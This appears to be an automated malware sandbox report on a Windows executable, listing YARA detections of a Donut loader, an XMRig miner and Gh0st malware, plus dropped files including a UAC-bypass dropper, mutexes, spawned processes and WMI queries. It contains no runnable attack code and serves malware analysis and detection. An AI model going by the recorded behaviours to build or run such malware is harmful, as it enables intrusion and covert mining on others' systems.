Source: 00000018.00000002.2249781552.0000000000845000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
Source: 00000014.00000002.2235023601.0000000000A8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000014.00000002.2235023601.0000000000A8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
Source: 00000010.00000003.2255180923.0000024769437000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000010.00000003.2218560312.000002476943E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000010.00000003.2265143646.0000024769433000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000010.00000003.2238560339.0000024769435000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000007.00000002.2189995465.00000236C4F60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000007.00000002.2189995465.00000236C4F60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
Source: 00000010.00000003.2261244602.000002476943C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000010.00000003.2237491368.0000024769430000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000011.00000002.2211357524.0000000000825000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000011.00000002.2211357524.0000000000825000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
Source: 00000010.00000003.2246350754.0000024769436000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000017.00000002.2257559925.0000000000925000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000017.00000002.2257559925.0000000000925000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
Source: 0000000F.00000002.2198853521.0000000000AA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000F.00000002.2198853521.0000000000AA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
Source: 0000000E.00000002.2259611805.000001EC44910000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000E.00000002.2259611805.000001EC44910000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
Source: 00000010.00000003.2257958978.000002476943B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000010.00000003.2262725045.0000024769431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000010.00000003.2236720791.0000024769432000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000C.00000002.2213477315.0000000000B97000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000C.00000002.2213477315.0000000000B97000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
Source: 00000010.00000003.2242162134.0000024769431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000010.00000003.2232579749.0000024769436000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000010.00000003.2239521563.000002476943F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000004.00000002.2151276225.0000000000AB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000004.00000002.2151276225.0000000000AB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
Source: 00000010.00000003.2263942655.0000024769433000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000010.00000003.2260012653.0000024769436000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000010.00000003.2231606755.0000024769434000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000010.00000003.2244730823.000002476943C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000010.00000003.2266356078.0000024769438000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000010.00000003.2230448544.0000024769438000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000010.00000003.2243392476.000002476943F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000010.00000003.2241271993.000002476943F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000010.00000003.2256496200.0000024769432000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000010.00000003.2240379880.000002476943D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000010.00000003.2220629227.0000024769433000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: conhost.exe PID: 2848, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe, type: DROPPED	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841

Source: classification engine

Classification label: mal100.expl.evad.mine.winEXE@52/21@1/1

Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\GcqJPBLD2Q.exe.log

Source: C:\Windows\System32\conhost.exe	Mutant created: NULL
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6012
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3040:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5156:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6120:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3468:120:WilError_03

Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe

File created: C:\Users\user\AppData\Local\Temp\Cool.exe

Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\explorer.exe			Jump to behavior

Source: GcqJPBLD2Q.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: GcqJPBLD2Q.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
